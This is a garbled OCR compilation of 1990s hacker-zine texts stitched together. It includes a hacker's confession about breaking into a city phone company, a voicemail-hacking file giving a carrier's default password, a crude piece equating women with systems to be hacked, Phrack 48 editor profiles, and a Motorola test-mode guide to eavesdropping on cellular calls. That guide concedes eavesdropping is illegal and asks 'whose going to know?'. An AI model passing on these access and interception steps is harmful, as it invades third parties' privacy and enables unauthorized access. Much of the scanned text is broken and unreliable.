He informed me that he knew about my hacking and would like to take a 
look at my computers. I told him that I didnt know what he was talking 
about, he just said we could do this the hard way and he could get a 
warrant to search the place. He wanted to meet me at my place in 10 
minutes. I said ok. I was shitting bricks by this time. I phoned my 
roomie and told him to get all printouts and disks out of the house 
and take them away...anywhere. I took off home and got there to find 
my roomie gone with all printouts and disks. I fired up the computers 
and formatted both HD’s. Formatting a hard drive had never taken so 
long before!! 


I waited for like an hour...no sign of the cops. My roomie came back 
and said where are the cops? I dont know I told him. I waited some 
more still no sign of them. I got a call about 3 hours later froma 
friend of my roomie and he asked if Constable Burke had showed up. I 
asked how he knew about that and all he did was laugh his ass off! Now 
I was thinking joke...bad joke...and it was. I managed to find out 
that this "friend" had gotten someone to pose as a police officer and 
call me to see my computers regarding hacking. Well the guy he got to 
pose as a cop did a good job at fooling me. I guess I was just over 
paranoid by this time. Plus I was really pissed as I lost a lot of 
info that I had acquired over the previous months when I formatted my 
hard drives. 


I guess my roommate had been telling a few people about what I was 
doing. I was more than a little pissed off at him as I had not told a 
soul of what I was doing since I knew it was illegal as hell. I got my 
disks back and burned the printouts and laid off the hacking for a few 
weeks. I started up again and was a tad more careful. I didnt keep any 
printouts and kept the info on disk to a minimum. 


Then about a month later my roommate, who worked for our landlord, 
came home one day and said that our landlord had been approached by 
some RCMP officer regarding me and my computers and what I might be 
doing with them. I said is this another joke? No he said, go talk to 
him yourself. I did but he wouldnt tell me much except that something 
was definitely going on regarding me, my phones and my computers. And 
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the RCMP were involved. 


After asking around I found out that quite a few people knew what I 
had been up too. All they knew is that I was some guy who had been 

cracking systems in town. But word had spread and I still dont know 
how the cops found out or how much they knew. 


But after talking to my landlord I quit right there and then. I went 
home formatted the drives again, all floppies and got rid of 
everything. I had hacked my way through everything in town that I 
could in about 6 months. Also by this time CityTel had upgraded their 
switch to some of the latest tech and had Caller-ID installed along 
with all the other goodies you can get these days. It was definitely 
time to quit. 


Not long after I started a BBS that I still run to this day. I figured 
that was a way to kill the hacking urge and be legit. I dont live with 
that roommate anymore. I’m married now and still think about it now 
and again but have too much to lose if I do and get caught. 


On another note about 3 months ago I was at work and dialed a wrong 
number. As fate would have it I got a blast of modem tone in my ear. 
My old hacker curiosity came alive and I made note of the number. We 
have a small lan at work that has a modem attached and when I had a 
free moment I dialed the number up. I got the banner: 


city telephones. No unauthorized use. 


XXXXXXxX <----a bunch of numbers 
username: 


I hung up right there but it was interesting to see that I had found 
CityTel’s switch or something of that nature. 


To this day I dont know if there were any other hackers in this small 
city where I live. As far as I know I was the only one that did any of 
this sort of thing. It was fun but near the end I could feel the noos 
around my neck. And I quit while the quitting was good. 


Today I help admin our small lan at work with 2 servers and 8 
workstations and the Unix I learned hacking helped me when my boss 
first started to get serious about computerizing the business. Since 
then I have been able to help setup and maintain the systems we hav 
today. 


I'll give the specs on our new KardGuard if anyone is interested as I 
know they come from the States and there must be more than a few out 
there. 


kwoody 
USING ALLTEL VMBs 
By Leper Messiah 
Ok. This is everything you need to know in hacking AllTel Mobile’s 
Voice Mail. The default password on all their boxes is 9999. 
Here are the docs, word for word. Enjoy! 
Features 
-=Basic=- 
Accessing your mailbox 


Ch 
Re 
Re 


anging your security code 
cording your name 
cording a personal greeting 
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Playing a message 
Recovering deleted messages 
Playback mode options 


—=Enhanced=— 

All of the Basic Features plus... 
Setting up your greeting schedule 
Replying to a message 

Redirecting a message 

Recording and sending a message 
Creating a broadcast list 
Personal greeting schedule 


At a glance 


VOICE MAIL SET UP Press 


change your security code 
record your name response 
record your personal greeting 

edit a greeting in your schedule 
activate your greeting schedule 
change your playback mode 


@MANNNN C 
@MANNN WN 
WCOnwIW WwW Ww 


SENDING AND RECEIVING MESSAGES 


5 


o play a message 

o save and play the next messag 
o reply to a message 
fe) 
fe) 


redirect a message 
create and send a message 


Wrwawnr 


Accessing your Voice Mail 


1. Access your Voice Mail. 
From a cellular phone press 
# 9 9 Send. 
From a landline phone dial your 
cellular phone number, which will 
automatically transfer to your voice 
mail and press # when greeting begins. 


2. Enter your security code. 
Creating/Changing your security code 


1. Access your Voice Mail. 
2. Press 8 for Personal Options. 
3. Press 2 3 to change your security code. 
* Note: Your security code can contain 1 to 7 digits. 


Recording your name 


Access your Voice Mail. 

Press 2 for your Greeting Menu. 

Press 3 3 to record your name. 

Record your name, finish by pressing #. 
Options 
Press 3 1 to play your name. 

Press 3 3 to erase and re-record your name. 


mw wN EF 


Recording a personal greeting 


Access your Voice Mail. 
Press 2 for Greeting Menu. 

Press 2 1 to play your greeting. 

Press 2 3 to record your greeting, 

record your greeting, finish by pressing #. 


mw wD EF 
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Playing a message 


1. Access your Voice Mail. 


Zip Press 1 to play your messages. 
3. Message will play. 
Options 


Press 1 to keep this message 
as new and play the next. 
Press 2 to save and play the 
next message. 

Press 3 to reply to a message. 
Press 4 4 to replay a message. 
Press 5 to erase a messag 
Press 7 to redirect the messag 


Press 8 8 3 from the main 

menu to choose a playback mode.* 
Continue to press 8 3 until the 
desired playback mode is selected. 


* Note: The system has three playback modes: 
normal, automatic, and simplified. 


Recovering deleted messages 


To recover a message that has been deleted: ** 
Press * 1 to go to the main menu, 
Press * 4 to recover all deleted messages. 


**x Note: Deleted messages can only be recovered 
before you exit the mailbox. 


Replying to a message 
From the Play Menu: 


1. Press 3 during or after a message. 
2. Record your reply finish by pressing #. 
3. Press 3 to continue recording a voice message. 


Press 5 to erase a messag 

Press 7 to select a special delivery option. 
4. Press 9 to address the messag 

If sent from a subscriber’s mailbox, 

the reply with be automatic. If not, enter 

the mailbox number. 


Redirecting a message 
From the Play Menu: 


ie Press 7 during or after a message. 
2. Press 3 to continue recording a 
voice message. 

Press 5 to erase a voice comment. 
Press 7 to select a special delivery 


option. 
Press 8 to play the original message. 

3. Press 9 to address the redirected messag 
Enter: 


a. mailbox number 
b. broadcast list number. 


Recording and sending a message 


1. Access your Voice Mail. 
Press 3 to record a message. 
3. Record your message finish by 
pressing #. 
Press 3 to continue recording a 


i) 
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voice message. 
Press 4 4 to review the 
recorded messag 
Press 5 to erase a messag 
Press 7 to select a special 
delivery option. 


Press 1 to mark a message urgent. 
Press 2 to mark a message confidential. 
Press 3 to select notification of non-delivery. 
Press 4 for future delivery. 
Press 5 to delete special delivery tags. 
4. Press 9 to address a message. 
Enter: 


mailbox number 
broadcast list 
0 + last name - 0 + first name 


Creating or editing a broadcast list 


1 Access your Voice Mail. 

2 Press 6 to access your broadcast list. 

3. Press 3 to create or edit a broadcast list. 

4 Enter a one- or two-digit broadcast 
list number. If new list, select any one- 
or two- digit number. If editing, enter 
the one- or two- digit number assigned. 

5. Enter all of the destinations. 

Press # after each destination entry. 

(destinations can be mailbox 

number or broadcast list numbers.) 


Gv. Press 7 3 to record a name for 
your broadcast list. 
7. Press # when finished. 


Setting up your greeting schedule. 


Press 2 from main menu. 
Press 2 6 to select your active greeting. 
Enter the greeting number you want active. 
Press 2 7 to edit a greeting. 
Enter the greeting number to be edited. 
Press 1 to play the current greeting. 
Press 3 to record a greeting. 
Press 5 to erase the greeting. 
Press 7 to change the time 
interval for this greeting. 
Press 8 to review the time interval 
for greeting. 

6. Press 2 8 to activate/deactivate 

your greeting schedule. 


OB WNER 


Message waiting notification 


1. Press 8 for Personal Options menu. 

2. Press 6 for Notification Options. 

3. Press 1 to play notification telephone number. 
Options 


Press 6 to enable/disable 
message notification. 


the message 
replay the date and time stamp 8 8 


AT ANY TIME DURING A MESSAGE PRESS 
To rewind by 6 seconds 4 

To rewind to the beginning of a message 4 4 
To fast forward by 6 seconds 6 

To fast forward to the end 6 6 

2 

fe) 
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[To stop and function 
To return to the main menu 


11 


+ 
ray 


Good luck hacking. 
—- Leper Messiah 


Hacking At 


Ease for the Macintosh 


Introduction: 


Some educational 


know how to be rid of it?? 


How to: 


so you can gain access to the Finder, 
password to one of your chosing, 


5.1 or 6.0 


this will tell 


Well, 


First off, 
(Norton Utilities Disk 


institutions and businesses use At 
discourage the pirating of programs and access to sensitive files, 
generally screwing up any fun you would have! 


you how to remove the password for At 
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Hackin’ GIRLS ’n SYST 
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by SevenUp sec@sec.d http://www.sec.de/sec/ 


Hitting on girls and hitting on systems (I’11l call them both "targets") 
has quite some similarities. If you are good in hacking one of them, 

it won’t be too hard to enter the other on 

It also represents IRC channel #hack’s current state of mind: 

Women’s talk is taking over. 


- Biggest Challenge: 
To get inside the first time 


—- Targets that have already been successfully hit by others lose a lot of 
their attraction 


- The goal is to keep as many successfully (formerly virgin) targets as 
possible 


—- Different game: Hit one target from every region 
—- Mark every target you hit 


- You don’t really care much after you got your target, unless (in rare 
cases) you love it 


TIPS FOR BECOMING SUCCESSFUL 
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Key to Success: 
The right "defaults", depending on situation and targets 


Be Cool: 
Don’t care too much about the target. Don’t get involved 
emotionally, but play a little with the target. 


Knowing different languages and keywords may be useful with targets 
of different origins 


Social Engineering and spending time (sometimes money) might lead t 
goal easier 


Oo your 


The more targets you’ll hit on, the more you’ll succeed. Just ignore any 


failings. Remember: Better to have tried (and maybe lost) than not 
have tried. 


Best time to find targets is at night 


Backdoors are always inviting (sometimes dangerous) 


even 


Don’t start with the top target. Start slow and easy and look for more 


difficult ones after some success 


If you get rejected on the first time, don’t give up. There is always 


a second chance 


When you just got little time to hit on the target, don’t hesitate 
a quick first try is never wrong and leaves you more time to think 
your second step. 


Scanning (and probing) is neccessary. Don’t give up, even your rate 
success lays somewhere between 1% and 50% 


ELECT THE RIGHT ON 


E 


Be selective about your targets! 


[ry targets with tight openings 


Targets with many users have mor xperienc 


Targets with shadows / shades are harder to enter 


From the inside it’s easier to reach the root-climax than from the 


Many targets look uninviting from the outside, but welcome you deep 
inside 


Some targets are leaking even before touching them 


If a target blows, it sucks 


ECHNIQUES FOR MORE FUN 


After entering it, let the target become active too! Let it do some 
and see what comes up. 


To protect your target, close all openings and save the key 


Even some targets that suck can be nice 


about 


of 


outside 


ly 


work 
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— Sniffing Targets: 
For lamers and perverts 


— Fingering Targets: 
Can be interesting... 


— Leeching targets dry makes fun, takes time and let’s them become 
kinda useless 


-— The right wrapper controls the intrusion and its consequences 


WARNINGS 


Remember: The number of tries is limited. After unsuccessful hits, the 
target and its environment will become awar start searching in a new 
area 


— NEVER just pay to get into a target 


- Don’t fall for booby traps! 


—- When calling up targets, make sure their owner doesn’t notice 
—- Don’t use crack on the target... it fucks up the brain 


—- Don’t fuck (up) the targets without protection 


Be aware: Some targets with change-root-environments can fake the 
root-orgasm, or make you feel coming inside when you are not inside 


- Penetrating a target too hard could use up or damage your tools 


- Try to identify faked and "cross dressed" targets before totally unwrapping 
them and finding a bad surprise 


—- When entering a virgin target the first time, you have to wipe the tracks - 
this can often be messy 


— Remember to get out of the target when you fall asleep 
— Never lose your mind over the beauty of a target. Always check for guards. 


- If you don’t watch out, you may get a lifelong sentence after a 9 month trial. 
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==Phrack Magazine== 


Issue Forty-Eight, File 5 of 18 


-:[ Phrack Prophile ]:- 


This issue, we hav 
everyone knows, 


staff is coming on board. 
hackers, we’ve had them do profiles. 
ladies OR gentlemen read Phrack), meet your new editors: 


and Voyager. 


a "very special 
Phrack is once again in flux, 


pisode" of the Phrack Prophile. As 

and an entirely new editorial 
In an effort to introduce everyone to these three 
Ladies and Gentlemen (yeah, like any 
Daemon9, ReDragon 


Personal 


Nomenclature: 
life: 
DOB: 
Likes: 
Dislikes: 
Ink: 


In real 


Other: 
Passions: 


Main URLs: 


Hardware 


Years with Computers: 
Computers Owned: 
Mids: 

Laptops: 


Networks Owned: 


Music: 


Movies: 


Books: 


A Bit of History 


Ah, the days of my youth... 
One spring a very good friend of mine told me I should get 
account to write him mail 


open door to me. 
an ‘*Internet’’ 
"Huh ow 


...Was my concise reply. 
but I had not gotten into th 
$200 2400 BPS modem and got me hooked up with this brand new 


a (at the time) 


service provider, NetCom Online... 
email, but soon after I taught myself all about Unix, 
wonders of Usenet and IRC 


Prophile on Daemon9 


daemon9/route/infinity 
Mike D. (as in David, 
10.05.73 

Women who aren’t afraid to cry. 


not Diamond) S. 


Hippies. GOD, I hate hippies... 
Large back piece, and growing... (It’s the outline of 
a die. (No, not as in a pair of dice, but as ina 


computer chip...) 

Glock 19 with trigger-guard mounted laser-sit 
Computers. Computer Security (or lack there of). 
Health. Mental and Physical aptitude. 
http://www.infonexus.com/~ daemon9 
ftp://ftp.infonexus.com/pub 
mailto://route@infonexus.com 
mailto://daemon9@netcom.com 


14ish 

Towers: P90/32MB/3GIG (Windows NT/Solaris/DOS-WFW) 
P120/32/2GIG (Linux), 486-66/16/700MB (FreeBSD), 
486-50/16/540 (Linux) 

P133/16/800, (Windows NT/Linux) 

486-75/16/500 (DOS/WEW) 

The Information Nexus (infonexus.com) 

Front242, FLA, The Goats, NIN, Diatribe, 16Volt, 
Morphine, etc... 


Usual Suspects, Miller’s Crossing, Sneakers, Fletch 
Army of Darkness, True Romance, NBK, etc... 

TCP/IP Illustrated vols. I-III, UNP, Applied 
Cryptogrpahy 2nd edition, Computers and Intractablity: 


A Guide to the Theory of NP-Completeness, and so on... 


Carefree, happy-go-lucky, life was a big 


while he was away at school. 


I was deep into the computer thing at that time, 
Internet yet. Well, we went out and bought 


At first I merely used the thing for 
I discovered all the 
Most people know me from my 


(AKA the Big Waste). 
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frequent alt.2600 presense. That’s where I met Voyager. We quickly found 
that we had the same interests as far as computers and hacking went. The 
rest is history... Sorta. 


The Theory Behind It All 


When I look back and try to figure out how the hell I got here, I have 
one person to thank. My father. He bought me my first Commodore 64. I can 
remember hooking that archaic thing up to my TV, writing my own adventure 
games in basic, and saving them to a tape drive. My computer time line goes 
something like this: 


c64 Apple IIc IBM XT IBM 286 486/33 486/66 P90 486/66 486/50 P120 P133... 
1982 1984 1986 1987 1991 1992 1994 1995 1996 1996 1996 


I am not happy unless I am bathed in a contstant stream of extraneous 
RF radiation. My room is alive with a myriad of blinking and flashing lights, 
several humming fans, and hundreds of feet of fire-hazard-inducing cables. 
I have to put tin-foil on all of my windows just to keep the sun out and the 
temperature down. You’d be amazed how well that works. 


The pursuit of knowledge is what led me down the path I am following. 
I am simply not satisfied with knowing that something works. I need to 
know why and how, and how to break it and then how fix it... I do not solve a 
problem by merely finding a work-around. I slam head on into the fucking 
thing and work with it until a solution presents itself. 


Intelligence, to me, is not what you know, or how much you know. It is 
the ability to reason logically and rationally when the need arises and, if 
pragmaticism is not the best approach, let intuition and chaos guide you. 
Intelligence is adaptive and ever-changing... Memory capacity is too often 
mistaken for smarts... 


People I Know 


Linenoiz: The reason I fell into the whole Internet scene to begin with. 
Best friends for 12 years, I would not be where I am now 
without him. He is one of the most intelligent people I know. 


Nihil: The reason I fell into the whole hacking scene to begin with. 
We have had our differences over the years, but our computing 
interests are too similar to let petty squabbles come in the 
way of our friendship. The other one of the most intelligent 
people I know. 


Mythrandir: I met Myth about 2 years on alt.2600. Sharp kid. Very sharp. 
We think so alike on some things it’s freaky. We’1ll get going 
on that Tiger Team soon enuff, Jeff...! 


Alhambra: Strong coder. We did the DemonKit for Linux (and are still 
working on it..;)). Jeremy and I also have very similar 
interests as far as hacking goes. I am glad he is here 


with me in the Guild. I need more people like him. Nota 
risky gambler, but hey, I took care of that for both of us... 


Halflife: Coder supreme. 


Shouts Out To 


Brent, Carrie, ColdFire, Crow, Halflife, Heather, Jason, Jen, Kev, 
Ka_mee, MikeP, Mudge, Shawn, SirSyko, Tim, Tom, Topher, Xanax, Vision 
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What I Have Done 


It used to be that you could find me in that group like clockwork. I 
was always there. Reading, posting, flaming, lurking. That was me. For 
years. This is where most people probably first remember me from. I took 
it upon myself to self-moderate and answer all the questions I could possibly 
handle... I usually posted several times daily. At last count, I posted over 
2100 times (according to ~/.tin/posted). I was prolific. I have fond memories 
of back then... But, times have changed. That group has gone almost completely 
to hell (AKA the way of #hack). Thesedays, it’s a fucking miracle if I finda 
worthwhile thread to follow-up to... These days, look for me on comp.security.*, 
comp.protocols.tcpip, sci.crypt, alt.security.pgp and so on... 


Oh yeah, I wrote some code and a few rag-tag articles for some Zines 
out there. Can’t remember the names... 


the Guild 


The Guild is my group of roudy Internauts. I started the group about 
20 months ago for several reasons, some of which are just *now* becoming 


clear to me. For a while there, we were putting out a zine, The Infinity 
Concept, but that is on hiatus while I do Phrack. Various members have done 
coding and exploits. Look for more to come from the Guild... 


ftp.netcom.com/pub/da/daemon9 


Somewhere along the line about 2 years ago, I started to take 
advantage of netcom’s free 5 megs of ftp space. I put together a modest 
collection of tools and whatnot (under 6 megs of stuff). For some yet 
undiscovered reason, people flocked to the site. I have no clue why. It 
wasn’t *that* great. What I find even more fascinating is the fact that 
to this day people *still* go looking there for hacking paraphenelia. 

The site has been vacated for almost a year now. If you are reading this 
and still have a link to my O-L-D netcom ftp site, UPDATE it to point to 
ftp.infonexus.com. I am *much* more proud of this site... Hundreds of megs 
of top-notch stuff here. Anyway, the netcom site went down because Brian 
Smith (at the time the only member of the netcom security staff) told me I 
couldn’t have certian tools there for distro. When I ignored him, he froze 
my account. This was the final catalyst in me deciding to start the 
Information Nexus... 


the Information Nexus 


Ah yes... The InfoNexus... My frustration with Netcom led me to do 
hat I had been wanting to do for some time, start my own site. This site 
ould be a Haven for hackers, a place where they could come and be sure to 
ind only the finest in technologies and tools. A place of much learning and 
nformation trade. A knowledge dumping ground. Thus was born the Information 
exus. With anywhere from 6-10 machines the Nexus is a heterogenous 
nvironment: the OS’s range from several Unix flavors, several versions of 
indows NT, and, of course, the mundane stuff (like DOS/WFW). The main box, 
nyx, is a heavily tweaked Linux machine. It is a P120 with 32MB RAM and 2 
GIGs of HD space. 

As it stands now, accounts are given on restricted basis, only to 


O.2 OD eS th SS 


friends and people I know (or people whose reputation precedes them). As soon 
as I upgrade the link from a 28.8 modem I will start offering accounts to the 
masses, at a nomial fee. I will also open up ftp access, allowing a greater 


number of users at all hours. 
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The Infinity Concept 


TIC is the zine the Guild put out. Some of the noteworthy subjects 
written on: Cryptography, Windows NT security, Unix security,the security 
of PGP, and several coding projects... We have done 3 issues to date, but 
I have stopped further production of the zine to devote my full attention to 
Phrack magazine. 


Phrack Magazine 


Several months back, I hopped on IRC with some of my Guild-mates and 
was having a wonderous discussion on, oh, nothing. Well, Voyager was on, and 
he dragged me into a private chat. He told me about ErikB stepping down, and 
told me he and ReDragon were to take over as the new editors... I was very 
happy for him, and told him I would have jumped at the chance to do it. That 
was his next question... Since then, ReDragon, Voyager and I have been 
salivating like dogs waiting to get our hands on the legend that is Phrack 
Magazine. 
My pledge is twofold: Timely distribution and nothing but the highest 
quality articles. We will be distributing Phrack on a regular seasonal 
rotation and will weed out all but the top-notch articles. I plan to write 
at least one article per issue. I promise this much: You will not be 
disappointed... 


Prophile on ReDragon 


Personal 


Handle: ReDragon 
Call Him: Dave 
Past Handles: Dr. Disk (circa ’84), The Destroyer (circa ’ 88) 
Handle Origin: Thomas Harris Book, Saab insignia, D&Dish sort of 
name, then I decided it would be cooler (and original) 
if it was all one word and one D. 
Date of Birth: 12/30/75 
Age of current date: do the math yourself 
Height: 5’ 11" 
Weight: 175 
Eye Color: Green 
Hair Color: Brown 
Computers: Apple ][e, Atari 800, 8088, 386sx/16, 386dx/40, and 
right now a 486/33 


I got my Hayes Micromodem //e in the summer of '’84. I was eight years old 
and with the help of my babysitter begged my way onto an H/P board. I used 
to read Phrack and write BASIC code, I was quite the clueless newbie for a 
while. People say age doesn’t matter, but it does when you are that young. 
My lameness continued, I learned Pascal, the years passed, and I started to 
figure out how things worked. I discovered Unix, it was cool. I learned 
what Crack was, I used it. Years passed I started to figure out how things 
worked. I would go into more detail but I don’t really care to tell th 
world about my life, ask me privately if you care. 


ReD’s Favorite 


Foods: Taco Bell (doesn’t everyone?), Young animals killed cruely 
Music: Pink Floyd, Beatles, anything not techno 
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Leisure: IRC is bad for you, just say no. 
Alcoholic Fun: Bottled beer, Jaegermeister, Long Island Iced Teas 


Most Memorable Experiences 


= 


Saab car trouble in Queens on the way to HOPE. 
Saab car trouble on PA Turnpike on way back from Pumpcon. 

Saab stranded on George Washington Bridge on way to SummerCon ’95. 
Saab finally breaks down on NY Turnpike on way home. 

SummerCon ’95 (memorable that I don’t remember any of it) 
SummerCon '96 (the worst organized con I have ever been to) 


The Green Machine (for altering my life more than I can imagine) 

Acker (even though you gave up on it all, wish I knew what you were doing now) 
Bluesman (why didn’t you tell me about C earlier?) 

Zorgo (for ruining my life showing me IRC) 

Wozz (I still don’t believe you grew up there) 

r00t (you’re all a bunch of idiots, but i love you) 

Asriel (we are pretty similar people, except I’m not a narq) 

Max-Q (screaming at me "Nice Fuckin’ Con!" after Summercon '’96, I was touched) 
Taran King (you were cool to me when I was nobody, I was impressed) 

Sirsyko (only hacker I know that I actually trust) 

ErikB (annoying him enough made for an interesting summercon and a new phrack) 
lOpht (for bringing back what hacking is really about) 

b (stuff?) 


Why Phrack? 


I have been in one way or another involved in the "hack scene" for more 
than half my life. I spent a large part of that on the lower end of the 
knowledge ladder, and throughout it all few people helped me along directly. 
What I recognize though is that there have been scores of people that have 
spent their time, at no personal gain to themselves, to help educate others 
about something that they know a bit more about than the rest of us. 

I read a lot of books to learn about hacking; I paid for them and the 
authors have gotten the money they deserve. I learned quite a bit from 
college; I paid quite a lot for college. But I have learned about hacking 
most of all from hackers. How can I repay those that have given me so much? 

We are rather fortunate to be in a position where we actually can give 
something back to them. We can give them a new generation of hackers that 
have the same opportunities to learn and to share their knowledge that we 
had. We can show them that we haven’t forgotten about where we started; we 
haven’t forgotten about why we are hackers; and we haven’t forgotten that 
to be a hacker is a passion, and it is something we are proud of. 

To my peers, consider giving something back to the community. To the next 
generation, learn from what we give and explore from what you learn; it will 
soon be your turn to take our place. And to those that made this all possible, 
to those that gave their own knowledge in the name of the community, the 
hundreds of authors, the ten editors, and most of all the readers: Thank You. 


—-ReDragon 


Prophile on Voyager 


Personal 


Handle: Voyager 
Call him: Will 
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Date of Birth: 06/23/69 
Age: 27 
Height: 6’ 
Weight: 200l1b 


Computers owned: 486DX4-100(FreeBSD), 486SX25(0S/2) and P-75 laptop (PC-DOS) 


How did this handle originate? I jumped on IRC one day and didn’t want 
to use my real handle, so I made this one up on the spur of the moment. 


How I Got Started 

I didn’t start hacking computers until I went to college. I taught 
myself to use PRIMOS and I started hacking because the 150k disk quota I 
was given wasn’t large enough for me to compile decent sized programs. 


I started hacking in ’87 and didn’t run into another hacker until ’91. 
I got Internet access and I found Phrack on ftp.eff.org. Wow! I 
thought, these people are serious. Shortly thereafter, I compiled the 
VMS client for IRC and I was talking to other hacker types on a regular 
basis. 


About that time, I put up a BBS. The system is now known as "Hacker’s 
Haven." The system has become fairly popular, with over 1,400 users 
surviving the last 90 day purge. 


In ’92, I wrote a "bot" in the IRC scripting language and called it 
"HackSrv." HackSrv distributed H/P files on demand and also opped all of 
us regular #hack cronies. 


Late in ’92 I moved to Atlanta and started organizing 2600 Meetings. We 
had a blast. We held them at my apartment. I can’t imagine what my 
neighbors thought. I still remember 40 people in my tiny living room 
huddled around the TV watching sneakers. One week, we were hacking on 
one terminal, IRC’ing on another, watching a lockpicking demo on the 
front door, sorting trash on the balcony, having firearms instruction in 
the bedroom, and setting off bottle rockets from the kitchen to the 
living room. The last is not a good idea, by the way. 


Over the course of the next few years, #hack went completely to hell. 

The place became littered with clueless newbies asking clueless newbie 
questions. Other people, usually even less clueful newbies, would kick 
and ban people for asking questions. This effectively stopped all useful 
conversation on #hack, as anyone who brought up a technical topic was 
likely to be kicked immediately. This led to a group of #hack ChanOp’s 
W 

h 

t 


ho had absolutely no technical knowledge and instead wasted away the 
ours stroking their egos. I was annoyed by the incredible cluelessness 
hat had taken over the once fine channel and decided to do something 


Towards that end, I wrote the #hack FAQ. The #hack FAQ was to be given 

to new people to bring them up to speed in a short amount of time. This, 
I reasoned, would raise the intellectual level on conversation on #hack. 
It would also set the tone for conversation on #hack back to the technical 
atmosphere I had known just a few years earlier. Later, the #hack FAQ 
became the alt.2600/#hack FAQ and it’s purpose was expanded to cover 

the newsgroup alt.2600. 


In the Summer of ’94 I moved to Denver and joined up with TNO. TNO is a 
group of friends who share an avid interest in computer and telephone 

security. Today, TNO consists of Cavalier, DisordeR, Major, Edison and 
myself. 


Over the last few years, I’ve written for Phrack, 2600, CoTNo and FUCK. 
I’ve wanted to be Phrack editor since Taran King retired. When ErikB 
told me he was looking to retire from the job, and that I was being 
considered as the next Phrack editor, it hit me just how big of a 
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responsibility this was. I spoke with ReDragon (Editor of FEH) and 
daemon9 (Editor of The Infinity Concept). Together, we agreed to set 
aside our current e-zine’s (I was the current Editor of CoTNo) and focus 
all of our attention on Phrack. We have received offers of support from 
many Old and new people in the hacking community. I am looking forward 
to a bright future for Phrack. 


Interests 
Women: Sharp and quick 
Cars: Big and fast 
Food: Spicy to the point of pain 
Music: Rock and Roll 
Favorite performers: Jimmy Buffett, The Eagles 
Favorite author: Joel Rosenberg 
Favorite Book: Unix Power Tools 


Most Memorable 


Experiences 


KL kicking me off #hack for saying that hacking was wrong. 


Captain Hemp hiding my address and phone number in a bag of trash. 


Reading my first sniffer log. 


Getting arrested with Captain Hemp outside of a Southern Bell facility. 


Finding the switch with the unpassworded root account. 


Being pulled over on the way to HoHoCon while we were moshing in the 


van. 


DeadKat and Cavalier doing the root dance. 


Being followed by the security guard with the baby seat. 


Major and I *not* getting mugged and beaten by the gang of thieves, even 
though he could barely stand up and neither of us were carrying at the 


time. 


Some People To Mention 


Major 


Cavalier 


The Presence 


Captain Hemp 


NoCar / K 


You are, at the same time, one of the best people I have 
ever known and one of the worst people I have ever 
known. I am just glad I am on your side, and you mine. 
I trust you with my life, and with a few of the 
Situations we’ve been through, that’s not just talking. 


You taught us all what was important in a group. Your 
steadiness and common sense has helped carry TNO through 
the dark times. As always, I’m glad to have you here. 
You can always be counted on, and that means a great 
deal to me. 


It is always a pleasure to talk to you. You have taught 
me more than anyone else in the scene. You will always 
be one of the best. The strength of your ethics will 
guide you through where lesser men would fail. 


There’s no one I’d rather be arrested with. 


Congratulations on your new system! 
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The Final Question 

I have met quite a few hackers. Very few have been "geeks" in the 
traditional sense of the term. I have met hacker business people, 
hacker jocks, hacker criminals, hacker stoners, hacker programmers, and 
hacker skater punks. It’s a sport for just about anyone with 
intelligence, dedication, and absolutely no respect for authority. 
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==Phrack Magazine== 


Volume Seven, Issue Forty-Eight, File 6 of 18 


Motorola Command Mode Information 


Written and typed up by Cherokee 


NOTE: The following text is only a few pages from an official Motorola 
handbook that I received, thanks to Obl. 


THIS IS NOT A COMPLETE HANDBOOK 


but it is very useful as a guide to learning how to use the self 
test instructions on the Motorola series of cellular phones. 


To actually enter the self test modes, THERE ARE SEVERAL STAGES 
BEFORE HAND THAT NEED TO BE DONE. They depend upon what type of 
Motorola mobile phone you possess. To my knowledge, the self test 
mode instructions are the same on every Motorola phone, the only 
difference will be how you enter the test mode. That I leave up to 
you to find out as there are lots of help files already out there, 
unless, there is a great demand for it. 


I will now show you how easy it is to use the test mode to your 
advantage. 


Say, your the average peeping Tom or Sally (what hacker isn’t?), 
this is how to listen in on other peoples mobile conversations. 


1.Enter the test mode. 

2.Turn the speaker on (08#) also called un-muting the receive audio. 
3.Tune into a channel (11xxxx#) (where x can range from 0 to 
600[TACS] and 1329 to 2047[ETACS].)... Although I’m not 100% sure 
of the channel mapping, (theres conversations in the range between 
600 to 1329), you’d do best to stick to playing around with these. 


You may have to try several different channels, to pick up a 
conversation, not every channel is occupied with a user. TE 
suggest you try 0 to 50, this is almost guaranteed to give you a 
result. BTW, it is actually illegal to monitor mobile 
communications without the consent of both parties, but hey, whose 
going to know? :-) 


Displaying information - Some handsets only allow display 1 line, 
and therefore you wont be able to s all of the information being 
sent to you. There are 2 ways around this. 1. Is to go and get a 
handset which can display 2 lines of information. 2. to send the 
data to your computer to display on the screen, apparently the 
data is sent and received in an unfamiliar packet format, and will 
need to be decoded. 


FINAL NOTE: 

There are several conflicting sources for some commands, this is 
because of different versions of the ROM, so I’m putting all of 
the test codes bundled together in this file, and will update the 
list if there are any significant changes, or I find out about a 
new command in a later ROM version. 


Gl 


Just one last final note to say hi to Davex[thanks for the NAM 
guide], Ratscabies, Maelstrom, Hi.T.Moonweed and Obl. 


Motorola Self Test Mode Instructions 
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INTRODUCTION 


Portable radio telephones ar quipped for self-test, allowing service 
personnel to control and monitor radiotelephone functions via the 
telephone keypad. The self-test mode operates at two levels: 


1) 


a status display level, which allows the portable telephone to 


operate normally while providing status indications in the display and; 


2) 


the service level, which removes the portable telephone from normal 


service and allows commands to be entered through the keypad to 
‘manually’ control the operation of the radiotelephone. 


2. 


2.1 


OPERATING PROCEDURES 


STATUS DISPLAY LEVEL OF SELF-TES 


This level of self-test is entered by momentarily shorting pin 6 of J2 


to ground, while turning the radiotelephone on. The self-test mode can 
also be entered using the portable radiotelephone test kit (RTL4228A and 
RTL4229A). 


In this level of self-test mode the radiotelephone will place and 
receive calls as normal except the radiotelephone displays status 
information. The displayed status information alternates between th 
channel number and RSSI status information, and the primary status 
information (SAT frequency, carrier state, signaling tone state, power 
level, voice/data channel mode, and Rx and Tx audio states). The format 


and 


explanation of this status information is given in Table 1 under 02# 


Radio Status Request. 


When dialing a phone number, the display of the status in formation 


ceases when the first digit of the phone number is entered. When the 


Snd button (or End or Clr) is pressed, the status information display 
resumes. 
2.2 SERVICING LEVEL OF SELF-TEST 


The 
the 


keypad. Such parameters as operating channel, output power level 


NOTE 


While in the servicing level mode of self-test, the 
display does not alternate. Only the primary status 
information is displayed. 


servicing level allows the servicing personnel to take control of 
radio operation by entering the test commands through the telephone 


muting, and data transmission can all be selected by entering the 
corresponding commands. The servicing level is entered from the status 
display level by pressing the (#) button. At this time the radio 


Geen: 


phones cease to function automatically in the radiotelephone system. 


